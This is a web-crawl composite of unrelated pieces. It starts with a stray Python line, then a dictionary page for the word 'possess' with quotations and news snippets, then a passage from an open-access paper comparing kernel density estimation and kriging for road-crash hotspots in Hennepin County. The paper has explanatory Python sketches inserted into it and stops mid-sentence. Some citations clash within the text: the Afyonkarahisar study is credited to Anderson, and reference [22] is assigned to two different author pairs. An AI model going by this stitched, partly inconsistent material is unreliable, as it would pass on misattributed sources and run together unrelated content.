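print(is_direct_variation(3, 35, 0))   # → True: reduces to y = -(3/35) x
```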
http://www.finedictionary.com/possess.html
# possess ## Definitions • THE MAN POSSESSED BY DEVILS • WordNet 3.6 • v possess have ownership or possession of "He owns three houses in Florida","How many cars does she have?" • v possess have as an attribute, knowledge, or skill "he possesses great knowledge about the Middle East" • v possess enter into and control, as of emotions or ideas "What possessed you to buy this house?","A terrible rage possessed her" • *** Map Showing Routes of Cartier, Champlain, and La Salle, also French and English Possessions at the Time of the Last... Self-possession of Fabricius, the Ambassador, under rather Trying Circumstances Webster's Revised Unabridged Dictionary • Interesting fact: Anti-modem laws restrict Internet access in the country of Burma. Illegal possession of a modem can lead to a prison term. • Possess To enter into and influence; to control the will of; to fill; to affect; -- said especially of evil spirits, passions, etc. "Weakness possesseth me.""Those which were possessed with devils.""For ten inspired, ten thousand are possessed ." • Possess To have the legal title to; to have a just right to; to be master of; to own; to have; as, to possess property, an estate, a book. "I am yours, and all that I possess ." • Possess To obtain occupation or possession of; to accomplish; to gain; to seize. "How . . . to possess the purpose they desired." • Possess To occupy in person; to hold or actually have in one's own keeping; to have and to hold. "Houses and fields and vineyards shall be possessed again in this land.""Yet beauty, though injurious, hath strange power, After offense returning, to regain Love once possessed ." • Possess To put in possession; to make the owner or holder of property, power, knowledge, etc.; to acquaint; to inform; -- followed by of or with before the thing possessed, and now commonly used reflexively. "I have possessed your grace of what I purpose.""Record a gift . . . 
of all he dies possessed Unto his son.""We possessed our selves of the kingdom of Naples.""To possess our minds with an habitual good intention." • *** Century Dictionary and Cyclopedia • possess To own; have as a belonging, property, characteristic, or attribute. • possess To seize; take possession of; make one's self master of. • possess To put in possession; make master or owner, whether by force or legally: with of before the thing, and now generally used in the passive or reflexively: as, to possess one's self of another's secret; to be or stand possessed of a certain manor. • possess To have and hold; occupy in person; hence, to inhabit. • possess To occupy; keep; maintain; entertain: mostly with a reflexive reference. • possess To imbue; impress: with with before the thing. • possess To take possession of; fascinate; enthrall; affect or influence so intensely or thoroughly as to dominate or overpower: with with before the thing that fills or dominates. • possess To have complete power or mastery over; dominate; control, as an evil spirit, influence, or passion: generally in the passive, with by, of, or with. • possess To put in possession of information; inform; tell; acquaint; persuade; convince. • possess To attain; achieve; accomplish. • possess Synonyms Have, Possess, Hold, Own, Occupy. Have is the most general of these words; it may apply to a temporary or to a permanent possession of a thing, to the having of that which is one's own or another's: as, to have good judgment; to have another's letter by mistake. Possess generally applies to that which is external to the possessor, or, if not external, is viewed as something to be used: as, to possess a library; if we say a man possesses hands, we mean that he has them to work with; to possess reason is to have it with the thought of what can be done with it. 
To hold is to have in one's hands to control, not necessarily as one's own: as, to hold a fan or a dog for a lady; to hold a title-deed; to hold the stakes for a contest. To own is to have a good and legal title to; one may own that which he does not hold or occupy and cannot get into his possession, as a missing umbrella or a stolen horse. Occupy is chiefly physical: as, to occupy a house; one may occupy that which he does not own, as a chair, room, office, position. • possess Holding Corioli in the name of Rome. • *** Chambers's Twentieth Century Dictionary • v.t Possess poz-zes′ to have or hold as an owner: to have the control of: to inform: to seize: to enter into and influence: to put (one's self) in possession (of): : • v.t Possess poz-zes′ (Spens.) to achieve • v.t Possess poz-zes′ (Shak.) put in possession of information, convince • *** ## Quotations • Dale Carnegie “Most of us have far more courage than we ever dreamed we possessed.” • Napoleon Hill “When your desires are strong enough you will appear to possess superhuman powers to achieve.” • Kahlil Gibran “You give but little when you give of your possessions. It is when you give of yourself that you truly give.” • Democritus “Happiness resides not in possessions, and not in gold, happiness dwells in the soul.” • Daphne Du Maurier “Happiness is not a possession to be prized. It is a quality of thought, a state of mind.” • Young “An idea discovered is much better possessed.” ## Etymology Webster's Revised Unabridged Dictionary L. possessus, p. p. of possidere, to have, possess, from an inseparable prep. (cf. Position) + sedere, to sit. See Sit Chambers's Twentieth Century Dictionary Fr.,—L. possidēre, possessum. ## Usage ### In literature: They entered in, and dwelt together: and the second possession was worse than the first. 
"Critical and Historical Essays, Volume III (of 3)" by Thomas Babington Macaulay The vote of the West, during this struggle, was of the first importance, as it possessed the balance of power, and could turn the scale at will. "Cotton is King and The Pro-Slavery Arguments" by Various What a blessing it is to possess such steadiness of nerve! "The Land of Thor" by J. Ross Browne He turned pale, but soon regained his self-possession. "The Cryptogram" by James De Mille Such a mind the world does not possess. "Epistle Sermons, Vol. II" by Martin Luther The Papacy, then in possession of supremacy over the world, made common cause with royalty. "A History of England Principally in the Seventeenth Century, Volume I (of 6)" by Leopold von Ranke He had something to lose which he was afraid of losing, which he was not sure even of possessing. "The Rainbow" by D. H. (David Herbert) Lawrence Scarcely one seemed to possess the incentive to breathe a whisper. "The Story of the Great War, Volume II (of VIII)" by Various His nose possessed that wonderful aquilinity associated with the highest type of Indian. "The Twins of Suffering Creek" by Ridgwell Cullum There are indeed few animals who possess so many tricks of all kinds to gain possession of their prey. "The Industries of Animals" by Frédéric Houssay But why does she not possess it herself? "The History of Woman Suffrage, Volume IV" by Various Like the latter it is specialized for sexual irritation and possesses very sensitive nerves. "The Sexual Question" by August Forel Jim gave him a quick glance as he moved across the room and possessed himself of the remaining pistol. "The One-Way Trail" by Ridgwell Cullum Remember, 'He who gains the youth, possesses the future,' as the saying goes. "Carmen Ariza" by Charles Francis Stocking I was a girl, inexperienced, innocent of coquetry, and yet I possessed all the instincts of a woman. 
"Beyond the Frontier" by Randall Parrish Probably all think it so but those who possess, or fancy they possess, it. "Shirley" by Charlotte Brontë The principal members of our government should possess the highest stamp of character, for never did there exist a purer people. "A Rebel War Clerk's Diary at the Confederate States Capital" by John Beauchamp Jones And such minds are possessed of all the power of the province. A fresh feeling of shame took possession of Leo. "The Undying Past" by Hermann Sudermann To make doubly secure their possession of Hill 304, the French pushed on beyond it for a distance of about a mile and a quarter. "The Story of the Great War, Volume VII (of VIII)" by Various *** ### In poetry: The star of the unconquered will, He rises in my breast, Serene, and resolute, and still, And calm, and self-possessed. "The Red Planet Mars" by Henry Wadsworth Longfellow My ancient friends were gone; Another race possess'd the walls, And I was left alone! "A Tale" by John Logan When sinners fall, the righteous stand, Preserved from every snare; They shall possess the promised land, And dwell for ever there. "Psalm 37 part 2" by Isaac Watts If I possessed such wondrous wings, I would soar and sing to heaven, Till my freed soul from sordid things, Should thus be widely riven. "Of A Skylark" by James Avis Bartley This night, vain fool, thy soul must pass Into a world unknown; And who shall then the stores possess Which thou hast called thine own. "The Worldling" by John Newton Sinne being gone, oh fill the place, And keep possession with thy grace; Lest sinne take courage and return, And all the writings blot or burn. "Good Friday" by George Herbert ### In news: Natasha Calis, Jeffrey Dean Morgan and Kyra Sedgwick celebrate at the Lure afterparty in Hollywood for Lionsgate's "The Possession.". Lionsgate's "The Possession" is a chilling scarer, but guests enjoyed a low-key evening at the movie's Hollywood premiere. 
School custodian charged with possessing child porn. A custodian at an elementary school on Long Island is under arrest Tuesday, charged with possession of child pornography. AP File Photo A Toms River school custodian was charged with possession and distribution of child pornography. Metalix was born in 1990 when an unholy spirit possessed Uncle Nasty then compelled him to play underground metal on the airwaves of Denver's KBPI radio. A Mexican woman has been arrested at the southern Arizona border for allegedly possessing animal tranquilizers often used in the commission of " date rape " sexual assaults. The Possession is supposedly based on a true story. Brian Donoher, Kettering Fairmont High School athletic director was charged with soliciting a prostitute, a third-degree misdemeanor, and possessing a criminal tool, a first-degree misdemeanor. MLive.com File Would you vote yes or no on a proposal to decriminalize marijuana possession and use in Grand Rapids. After months of discussion and weeks of debate, Chicago's move to decriminalize low-level marijuana possession sails through City Council with virtually no dissent. New York's Republicans have shot down a bill that would have decriminalized the public possession of nearly an ounce of marijuana. A bill decriminalizing possession of up to a half ounce of marijuana has advanced with bipartisan support in the New Jersey Legislature. TRENTON — An Assembly panel is set to hear a bill Monday that would decriminalize possession of small amounts of marijuana, making the offense similar to a parking violation. Detroit voters looking to weigh in a ballot proposal that would decriminalize possession of a small amount of marijuana may have to keep waiting. *** ### In science: They have as typical fibre a usual vector space, and possess local trivializations with suitable properties. 
Locally trivial quantum vector bundles and associated vector bundles It has long been known that supernova remnants (SNRs) possess magnetic fields. OH Zeeman Magnetic Field Detections Toward Five Supernova Remnants Using the VLA The Sch¨odinger equation for an oscillator possesses two parameters – the energy E and the cyclic frequency ω . Dyon-Oscillator Duality If M is an arbitrary manifold, the vector bundle T M × R → M possesses a natural Lie algebroid structure. Generalized Lie bialgebroids and Jacobi structures Let us suppose there exists an action ˜A[H ] which possesses the vacuum solution Hv and describes well-defined space-time dynamics of H . Point particle in general background fields and generalized equivalence principle These field theories possess nontrivial classical solutions . Conformal field theory, boundary conditions and applications to string theory The N = 1 Virasoro algebra also possesses a geometric interpretation. Conformal field theory, boundary conditions and applications to string theory Rational VOAs possess two surprising properties : The homogeneous subspaces M(n) of the representation spaces M are finite-dimensional, and there are only finitely many inequivalent irreducible representations. Conformal field theory, boundary conditions and applications to string theory Superconformal chiral CFTs with N = 2 supersymmetry possess in addition at least one more simple current, which we call s. Conformal field theory, boundary conditions and applications to string theory Note that the horizontal row sequences possess periods 3n . Exact solutions to chaotic and stochastic systems Note that only a nonsingular bicomplex number can possess an inverse. Bicomplex algebra and function theory We always assume that the C ∗ -algebras possess a unit 1. 
Charakterizations of the Generators of Positive Semigroups on C*- and von Neumann Algebras The term Schmidt correlated refers to any density matrix or set of density matrices which have eigenvectors possessing the same Schmidt basis. Optimal local discrimination of two multipartite pure states It is nondegenerate almost surely and it possesses a natural volume element induced by the standard metric in RPn . SU(1,1) Random Polynomials The CP 1 -submodel possesses an infinite number of conserved currents and a wide class of exact solutions. Integrable Submodels of Nonlinear $\sigma$-models and Their Generalization ***
https://www.springerprofessional.de/identification-of-crash-hotspots-using-kernel-density-estimation/10911522?fulltextView=true
01.06.2015 | Issue 2/2015 | Open Access

# Identification of crash hotspots using kernel density estimation and kriging methods: a comparison

Journal: Journal of Modern Transportation, Issue 2/2015. Authors: Lalita Thakali, Tae J. Kwon, Liping Fu

## 1 Introduction

Identification of hotspots is a systematic process of detecting road sections that suffer from an unacceptably high risk of crashes. It is a low-cost strategy in road safety management in which a small group of road network locations is selected from a large population for further diagnosis of specific problems, selection of cost-effective countermeasures, and prioritization of treatment sites. These identified sites are known in the literature by various terms, such as hazardous locations, hotspots, black spots, priority investment locations, collision-prone locations, or dangerous sites. Various approaches are aimed at identifying hotspots. One well-known approach uses statistical crash models. This approach relates crashes to potential explanatory variables such as road characteristics, traffic level, and weather factors using historical records [1–5] and subsequently uses these models to identify relatively high-risk sections. The alternative approach is a geostatistical technique, which differs from the former by accounting for the effects of unmeasured confounding variables through the concept of spatial autocorrelation between crash events over a geographical space. The focus of this study is to identify crash hotspots using the latter approach. Here, two distinctive geostatistical methods are evaluated and compared: one is the widely used kernel density estimation (KDE) method, and the other is the kriging method. The paper is arranged as follows.
The following section provides a review of the existing literature on hotspot identification. It is followed by a description of the study methodology with a brief background on the KDE and kriging methods. Detailed findings and comparisons are then presented in the Results and Discussions section. Lastly, conclusions are drawn in the final section.

## 2 Literature review

Hotspots, defined as relatively high-risk locations, are commonly identified on the basis of some specific selection criteria. Many different methodologies and criteria have been developed to improve the accuracy of the hotspot identification process, and thus the cost-effectiveness of a safety improvement program [6]. One of the most commonly used selection criteria is defined by the expected collision frequency at the sites of interest. This criterion emphasizes maximizing the system-wide benefits of safety interventions targeted at the hotspots, whereas another commonly implemented criterion considers the expected collision rate (i.e., expected collision frequency normalized by traffic exposure), which emphasizes the individual road user's equity perspective [7]. The expected collision frequency at a site is commonly estimated using a collision model-based approach, in which collision frequency is statistically modeled as a function of relevant features such as road characteristics, traffic exposure, and weather factors [1–5]. Roads are normally divided into homogeneous sections of equal length, with intersections as spatial analysis units. Various count models, with the negative binomial (NB) being the most popular, are used to estimate the expected number of crashes over the road network in a study area, and the estimates are subsequently compared with a pre-specified threshold value to determine whether a site is a hotspot.
Note that the NB models are normally used in an empirical Bayes (EB) framework to better capture the local experience of safety levels [1, 6]. One of the most critical parts of this modeling approach is the assumption of a probability distribution for the crash count and the functional specification of the model parameters. If these components are incorrectly specified, applying such count models could lead to incorrect hotspots. In addition, this approach is data intensive and requires significant effort in collecting and processing the related data and calibrating the corresponding models [8]. The expected crash frequency can also be estimated using a geostatistical technique by considering the effects of unmeasured confounding variables through the concept of spatial autocorrelation between the crash events over a geographical space [9–13]. KDE is one example that has been used in road safety to study the spatial pattern of crashes and identify hotspots [8–12]. Similarly, there are other geostatistical methods, such as clustering methods, that evaluate relative risk based on the degree of association with the surroundings. Examples of these methods used in road safety studies are K-means clustering [14, 15], nearest neighborhood hierarchical (NNH) clustering [16–18], Moran's I index, and Getis-Ord Gi statistics [19–21]. Anderson et al. [11] applied the KDE method in the City of Afyonkarahisar, Turkey, and were able to detect high-crash-risk sections, which were concentrated at road intersections. Similarly, Keskin et al. [13] and Blazquez and Celis [12] used the KDE and Moran's index methods to observe the temporal variation of hotspots across the road network. Khan et al. [21] used Getis-Ord Gi statistics to explore the spatial pattern of weather-related crashes, specifically crashes related to rain, fog, and snow conditions.
A distinct spatial pattern was revealed for each category of weather conditions, which further suggested the need to prioritize treatments based on different weather conditions and locations. Pulugurtha et al. [9], Pulugurtha and Vanapalli [22], and Ha and Thill [23] employed the KDE method to investigate the spatial variation of pedestrian crashes and hazardous bus stops. These studies have shown the potential to effectively and economically address pedestrian and passenger safety issues. Other studies by Levine [17] and Kundakci and Tuydes-Yaman [18] used the NNH clustering method to detect crash hotspots across the road network. A noticeable difference among the aforementioned geostatistical methods is how spatial correlations are considered. For example, in the KDE method, a symmetrical kernel function, which is a function of bandwidth, is placed on each crash point, generating a smooth intensity surface. Then, for a given point of interest, the crash intensity is the summation of all the overlapping surfaces due to the crashes. In contrast, in a clustering technique such as NNH, a threshold value, which determines the extent of clustering in the neighborhood, is pre-specified. If the distance between a pair of crash data points is smaller than the threshold value, the crashes are grouped into the same cluster. Additional criteria, such as a minimum number of points per cluster, can also be specified. This variation in allocating different weights to the crashes occurring in the neighborhood (e.g., the KDE method) or simply grouping crashes into clusters clearly indicates that these techniques are likely to produce different results in terms of the size, shape, and location of hotspots. One attractive aspect of the KDE method compared to other variants of clustering methods is that it takes into consideration the spatial autocorrelation of crashes (see Sect. 4.1 for a more detailed explanation). Moreover, the method is simple and easy to implement.
This could be one of the reasons that the KDE method is so widely used in road safety. Among past efforts on geostatistics-based methods, another popular technique, kriging, has rarely been explored in road safety analysis. As one of the most advanced interpolation methods, kriging has been utilized widely across many different fields of study that require spatial prediction. With little prior information, this technique is able to provide a best linear unbiased estimator (BLUE) for variables that tend to vary over space [24, 25].

## 3 Study area and data description

The region of interest for this study is Hennepin County, Minnesota, which encloses the City of Minneapolis, the 14th-largest metropolitan area according to the United States Census Bureau [26]. The county has a dense road network with high crash potential, making it an ideal location for the intended study. The study is based on historical crash data from 2003 to 2007 on major highways, as depicted in Fig. 1. These crash data were originally collected by the Minnesota Police Department, and maintained and archived by the Minnesota Department of Transportation (Mn/DOT). The crashes in the dataset were already geocoded and included important information such as the severity of crashes (i.e., fatality, injury (three different categories), and property damage only) and the weather conditions at the time of the crashes. Figure 2 shows that more than two-thirds of the crashes occurred in clear weather conditions. Similarly, more than two-thirds of the crashes involved property damage only. The time of day of each crash is also known from the dataset, which gives an opportunity to explore temporal trends in hotspot patterns across the highway network. Figure 3 shows the total number of crashes that occurred within the 5-year period for different times of day. Morning crashes are concentrated in the 7–9 AM period and evening crashes in the 4–6 PM period.
Therefore, we categorized crashes as morning peak hours (7–9 AM), evening peak hours (4–6 PM), and the rest as off-peak hours. A total of 38,748 crashes were recorded over the 5 years, of which 5,331 occurred in the morning peak, 7,712 in the evening peak, and 25,705 in off-peak hours. From Fig. 4, it is clear that the peak hours have a higher rate of crashes (i.e., per year per hour) than the off-peak hours, which could be due to higher traffic exposure.

## 4 Methodology

Figure 5 presents an outline of the methodology for this study. As mentioned previously, two geostatistical methods, the KDE and kriging methods, were used to estimate crash intensity over the whole region. A brief description of each method is presented in Sects. 4.1 and 4.2. Following the crash estimation, a buffer of 400 m on either side of the highways was used to demarcate the estimated outputs from the two methods. A primary intent of choosing a buffer size of 400 m was to match the predefined spatial analysis unit, which was used to aggregate and produce the resulting outputs (i.e., estimates of crashes) from the two methods considered in this study. In addition, areas that do not enclose highway segments are unlikely to have any record of crashes; such areas were therefore excluded from the analysis by considering only the buffered areas. In a real-world application, use of 400 m can be considered reasonable for carrying out safety treatments while providing sufficient precision for identifying the actual locations of crashes. A smaller cell may be more prone to producing inaccurate crash statistics, while a larger cell is likely to exhibit a loss of detailed information. Most importantly, as one of our objectives is to compare the performance of the two methods, selection of an equal-sized cell was essential to enforce a fair comparison. Selection of the cell size is discussed further in Sect. 4.1.
The estimated results obtained from each method represent a quantitative measure of risk level, reflecting the potential for crash occurrence. Thus, a road section with a larger value has a higher chance of crashes than one with a lower value. The risk level along the highways was classified into 10 levels using a quantile classification method. In this method, the entire set of estimated grid cells (ordered by estimated value) is divided into ten groups, with each group having an equal number of cells. Then, the top-most level (i.e., level 10), representing the highest-risk highway sections, was selected as the hotspots. Finally, the two selected estimation methods (i.e., the KDE and kriging methods) were compared using a prediction accuracy index and a ranking process. Details specific to the proposed methods are explained in the following sections.

### 4.1 Method I: Kernel density

The KDE, a non-parametric approach, is one of the most commonly used and well-established spatial techniques for estimating crash intensity for hotspot identification [9–13]. In this method, a circular search area defined by a kernel function is placed over each crash (a discrete point), resulting in an individual smooth and continuous crash density surface (see Eq. (1) and Fig. 6 for a 2D visualization). Then, a grid of cells is overlaid on the study area. For a given cell, the density is estimated by summing the overlapping density surfaces resulting from each crash point. This procedure is repeated for all reference grid cells. Note that kernel functions are symmetrical mathematical functions.
$$f(x,y) = \sum\limits_{i = 1}^{n} {\frac{1}{{2\pi nh^{2} }}} \times W_{i} \times K\left( {\frac{{d_{i} }}{h}} \right),$$ (1)

where f(x, y) is the density estimate at the location (x, y); n is the number of observations; h is the bandwidth; K is the kernel function; d_i is the distance between the location (x, y) and the ith observation; and W_i is the intensity of the observation. For crash counts, W_i is unity, whereas it may vary when different weights are assigned to different crash severities. There is a wide choice of kernel functions, such as the normal, uniform, quartic, Epanechnikov, and triangular kernels. Among them, the most popular are the normal kernel [16, 17], used in CrimeStat, and the quartic kernel [20], used in ArcGIS. According to Silverman [27], the outcomes are not very sensitive to the choice of kernel function. In our study, we initially considered the normal and quartic kernels with bandwidths of 400 and 800 m to estimate the density for all crash cases. As shown in Fig. 7, the general pattern of the density estimates represented by the color-coded maps appears very similar; for example, the highest-risk zones in red closely coincide. With this supporting evidence, we chose the normal kernel for the rest of the KDE estimations. Note that CrimeStat and ArcMap were used as the GIS platforms for the analysis. The two main parameters that affect the KDE are the bandwidth and the cell size. The output of KDE is presented in raster format consisting of a grid of cells. Intuitively, the size of a cell has to be reasonable to represent crash clusters occurring in reality. The selection of size is also a trade-off among the computation time, the sample size, and the information to retain. A larger grid cell size saves processing time; however, the information is averaged over a larger area, resulting in a loss of information. Meanwhile, too small a grid cell size increases the computation time.
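To make Eq. (1) concrete, below is a minimal, illustrative sketch of grid-based KDE with a normal kernel in Python/NumPy. This is not the paper's actual workflow (the authors used CrimeStat and ArcMap); the function name, coordinates, and toy clusters are hypothetical.

```python
import numpy as np

def kde_grid(crashes, cell_centers, h=400.0, weights=None):
    """Evaluate Eq. (1) with a normal (Gaussian) kernel.

    crashes      : (n, 2) crash coordinates in metres
    cell_centers : (m, 2) grid-cell centre coordinates in metres
    h            : bandwidth = standard deviation of the normal kernel, metres
    weights      : per-crash intensities W_i (unit weights for crash counts)
    """
    crashes = np.asarray(crashes, dtype=float)
    centers = np.asarray(cell_centers, dtype=float)
    n = len(crashes)
    w = np.ones(n) if weights is None else np.asarray(weights, dtype=float)
    # d_i: distance from every cell centre to every crash point
    d = np.linalg.norm(centers[:, None, :] - crashes[None, :, :], axis=2)
    # f(x, y) = sum_i W_i * exp(-d_i^2 / (2 h^2)) / (2 pi n h^2)
    return (np.exp(-0.5 * (d / h) ** 2) * w).sum(axis=1) / (2.0 * np.pi * n * h**2)

# toy data: a dense and a sparse crash cluster on a 400 m grid
rng = np.random.default_rng(0)
crashes = np.vstack([rng.normal(1000.0, 150.0, (30, 2)),
                     rng.normal(4000.0, 150.0, (10, 2))])
xs = np.arange(200.0, 5000.0, 400.0)
centers = np.array([(x, y) for x in xs for y in xs])
density = kde_grid(crashes, centers, h=400.0)
```

Cells near the denser cluster receive a higher density; ranking `density` and keeping the top decile of cells would mimic the hotspot selection described in Sect. 4.3.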
Moreover, such a fine level of granularity may not be necessary from the perspective of designing a safety program. Considering safety treatments over a reasonable section length, and allowing some margin for potential inaccuracy in the geocoding of crash locations, a 400 m grid cell was used. Sizes vary from one study to another (e.g., Anderson [11] used 100 m; Erdogan et al. [10] used 500 m; Blazquez and Celis [12] used 100 m). Another important parameter in the KDE method is the selection of the bandwidth, which determines the extent of the search area. Depending on the type of kernel estimate used, this interval has a slightly different meaning. For the normal kernel function, the bandwidth is the standard deviation of the normal distribution. For the uniform, quartic, and triangular kernels, the bandwidth is the radius of the search area to be interpolated. The choice of bandwidth is quite subjective [11, 28, 29]. Typically, a narrower bandwidth will lead to a finer density estimate with all the peaks and valleys detected, whereas a larger bandwidth will lead to a smoother distribution and will therefore detect less variability between areas. While smaller bandwidths show greater differentiation among areas, one has to keep in mind the statistical precision of the estimate. Brimicombe [30] suggested that the bandwidth be 6, 9, or 12 times the median nearest-neighbor distance. In general, it is a good idea to experiment with different fixed intervals to see which results make the most sense [28]. Previous researchers have used values ranging from 20 to 1,000 m (e.g., Xie and Yan [22] used 20, 100, 250, and 500 m; Ha and Thill [23] used 400 and 800 m; Erdogan et al. [10] used 500 m; Keskin et al. [13] used 200 m; Blazquez and Celis [12] used 1,000 m). In our study, we considered two different bandwidth values, 400 and 800 m (equal to and double the cell size).
It is reasonable to consider that correlation exists among crashes within a short length of 200 m on either side (i.e., 200 m on either side of a road section means a total section length of 400 m). The 800 m value was used to study the sensitivity of the hotspot pattern to the bandwidth.

### 4.2 Method II: Kriging

Kriging is a generic term coined by geostatisticians for a family of generalized least squares regression algorithms, in recognition of the pioneering work of the mining engineer Danie Krige [31]. The main idea behind kriging is that the predicted outputs are weighted averages of the sample data, and the weights are determined in such a way that they are unique to each predicted point and are a function of the separation distance (lag) between the observed location and the location to be predicted. In other words, kriging provides estimates at unknown locations based on a set of available observations by characterizing and quantifying the spatial variability of the area of interest. Let x and x_i be location vectors for the estimation point and a set of observations at known locations, respectively, with i = 1, …, n. In this study, x indicates a single point/location at which the number of crashes likely to occur is estimated using the nearby observations x_i. Based on the n available crash frequencies, we are interested in estimating the number of crashes at any given location, denoted by $$\hat{Z}(x)$$. The expression of a general kriging model is as follows [32]:

$$\hat{Z}(x) = m(x) + \sum\limits_{i = 1}^{n} {\lambda_{i} } [Z(x_{i} ) - m(x_{i} )],$$ (2)

where m(x) and m(x_i) are the expected values of the random variables Z(x) and Z(x_i), and λ_i is the kriging weight assigned to datum Z(x_i) for estimation of the crash frequency at location x. The random field Z(x) can be decomposed into two components, namely a residual component R(x) and a trend component m(x), and expressed as Z(x) = R(x) + m(x).
The three main variants of kriging, namely simple kriging (SK), ordinary kriging (OK), and universal kriging (UK), are distinguished according to the model considered for the trend component m(x). The most widely used approach, OK, assumes a constant mean over each local neighborhood, whereas SK assumes a constant mean over the entire study area, a characteristic that often limits its wide application. UK is a hybrid method based on point observations and regression of the target variable on spatially exhaustive auxiliary information [25]. In our analysis, OK was used, as it is relatively simple yet powerful and less data intensive. As mentioned previously, a fundamental assumption of geostatistical methods is the existence of spatial autocorrelation. The investigation of autocorrelation is essential in most geostatistical analyses and is done by modeling the spatial dissimilarities (semivariogram) based on the available sampling of the attribute of interest [24]. The most commonly adopted tool for capturing spatial data that exhibit weak stationarity is the semivariogram, given in Eq. (3):

$$\hat{\gamma }(h) = \frac{1}{2n(h)}\sum\limits_{i = 1}^{n(h)} {[Z(x_{i} + h)} - Z(x_{i} )]^{2} ,$$ (3)

where $$\hat{\gamma }(h)$$ is the sample semivariogram, Z(x_i) is a crash frequency measurement taken at location x_i, and n(h) is the number of pairs of available crash frequency observations separated by the lag distance h. Typically, a mathematical model is fitted to the sample semivariances; a few examples are the exponential, Gaussian, and spherical models. Esri's ArcGIS 10.2 comes equipped with a geostatistical analyst package that offers a user-friendly kriging interpolation tool. OK was utilized to obtain the interpolated surface for all data with different temporal units at an aggregation level of 400 by 400 m.
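As an illustration of Eqs. (2) and (3), the sketch below computes a sample semivariogram and solves the ordinary-kriging system at one prediction point. It is a simplified stand-in for the ArcGIS workflow described above, not the authors' code: the variogram model, lag tolerance, and toy crash counts are invented for the example.

```python
import numpy as np

def sample_semivariogram(coords, z, lags, tol):
    """Eq. (3): gamma(h) = sum[(Z(x_i + h) - Z(x_i))^2] / (2 n(h)),
    pooling all point pairs whose separation is within +/- tol of each lag."""
    coords, z = np.asarray(coords, float), np.asarray(z, float)
    i, j = np.triu_indices(len(z), k=1)
    d = np.linalg.norm(coords[i] - coords[j], axis=1)
    sq = (z[i] - z[j]) ** 2
    out = []
    for h in lags:
        m = np.abs(d - h) < tol
        out.append(sq[m].sum() / (2.0 * m.sum()) if m.any() else np.nan)
    return np.array(out)

def ordinary_kriging(coords, z, x0, gamma):
    """Ordinary kriging (constant local mean, Eq. (2)): solve the system
    [Gamma 1; 1^T 0][lambda; mu] = [gamma0; 1], then Z_hat(x0) = lambda . z."""
    coords, z = np.asarray(coords, float), np.asarray(z, float)
    n = len(z)
    d = np.linalg.norm(coords[:, None, :] - coords[None, :, :], axis=2)
    A = np.ones((n + 1, n + 1))
    A[:n, :n] = gamma(d)
    A[-1, -1] = 0.0
    b = np.ones(n + 1)
    b[:n] = gamma(np.linalg.norm(coords - np.asarray(x0, float), axis=1))
    lam = np.linalg.solve(A, b)[:n]   # weights sum to 1 via the Lagrange row
    return float(lam @ z)

# toy crash counts at five cell centres; exponential variogram model (illustrative)
gamma = lambda h: 1.0 - np.exp(-h / 500.0)
pts = np.array([[0.0, 0.0], [400.0, 0.0], [0.0, 400.0], [400.0, 400.0], [800.0, 800.0]])
counts = np.array([10.0, 12.0, 11.0, 13.0, 4.0])
estimate = ordinary_kriging(pts, counts, [200.0, 200.0], gamma)
```

Because γ(0) = 0, kriging honors the data exactly at observed locations; between the four close cells the estimate is a weighted average dominated by the nearest observations.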
An extensive amount of heuristic trial and error was carried out to ensure that the selected semivariogram model and parameters produce unbiased results (i.e., the mean prediction error should be close to 0, while the standardized RMSE should be close to 1). Several parameters need to be carefully determined when constructing a semivariogram model, among them the sill, range, and nugget. The sill represents the level of the plateau (if it exists), while the range represents the distance at which the semivariogram reaches the sill, commonly interpreted as the degree of spatial correlation. The nugget accounts for micro-scale variation and measurement errors, i.e., any spatial variability that exists at a distance smaller than the shortest distance between two measurements. For more information on how to build a good semivariogram model, readers are advised to refer to the comprehensive work by Olea [33].

### 4.3 Hotspots selection criteria

After estimating the number of crashes over the grid cells, the outputs are presented in a color-coded map. In both methods, the estimation takes place over the entire study region. Areas without the road network are likely to have mostly zero values, except regions very close to the network; in any case, areas outside the network are not of interest. Such areas were discarded by extracting only the results lying within a buffer of 400 m on each side of the highways. This particular value was selected to make sure that all the grid cells of 400 by 400 m in the vicinity of highways are included. Note that only the major roads under the jurisdiction of the Minnesota Department of Transportation in Hennepin County have been considered in this study. The next step is selecting a set of high-risk zones (i.e., the hotspots). There is no universal rule or threshold value that defines what a hotspot should be.
It is an arbitrary selection of a cutoff value that screens out the relatively higher-risk areas over the given study area. An example of such a value is the overall average of the estimated output [6]: when the estimated value for a given location is higher than this threshold, the location is considered a hotspot. In the real world, however, this could be decided based on budget availability. An alternative, which is used in this study, is the quantile method, in which the estimated values are classified into a chosen number of classes, with the data distributed equally among them, resulting in an equal number of grid cells in each class [9, 34]. Note that both methods use the same grid cell size (i.e., 400 by 400 m), thus controlling the total number of cells for the comparison. Each class represents an order of severity based on crash risk level. We label these categories as risk level 1, risk level 2, and so on. "Hotspot" is then determined by the top thematic risk level, i.e., level 10. As we are comparing the performance of the KDE and kriging methods, which have different output units, this approach makes a fair comparison from the perspective of consistency in hotspot coverage.

### 4.4 Comparisons

The prediction accuracy index (PAI) developed by Chainey et al. [34] was used as a performance measure to compare the two proposed methods (see Eq. (4)). It was initially developed in a crime-mapping context [34, 35, 37] and has been used in road safety as well [18]. Here, we have made a slight modification to the denominator, using the length of the road segment instead of its area. This is reasonable, as a highway network is better represented by a linear 1-D feature than by a 2-D feature.
Meanwhile, we also calculated the PAI in terms of area:

$${\text{PAI}} = \frac{{\frac{n}{N} \times 100}}{{\frac{m}{M} \times 100}} ,$$ (4)

where n is the number of crashes in hotspots, N is the total number of crashes, m is the length of highway sections in hotspots (or the area covered), and M is the total length of highway sections (or the total area covered). As seen in Eq. (4), the PAI is the ratio of the percentage of crashes occurring within the identified hotspots (say A) to the percentage of area covered by them (say B). Intuitively, the higher the PAI value, the better the performance. Note that one reason for normalizing "A" by "B" is that a higher "A" value alone does not necessarily indicate a better ability to identify risk zones. For example, if we identify the whole region as hotspots ("B" is 100), then "A" is also 100, so the unnormalized measure would be a perfect 100; with the normalization by "B," the PAI becomes 1, which is reasonable. Moreover, the PAI measures the ability to locate a high number of potential crashes in a small area. As a convincing example, say we have 25 % of crashes occurring in hotspots that represent 50 % of the total area, and similarly 25 % of crashes in 80 % of the area; the PAI values will then be 0.5 and 0.31, respectively. Scientifically, we would choose the method that yields the first case (i.e., PAI 0.5), as road agencies can then allocate resources effectively by mobilizing them over a smaller area in treating high crash potentials. In addition, another measure, which compares the physical locations of the hotspots delineated by KDE and kriging, was used to see whether their outcomes are similar or different, and to investigate whether one approach can substitute for the other. For this comparison, only those hotspot locations commonly identified by both methods were extracted, and their matching rate was 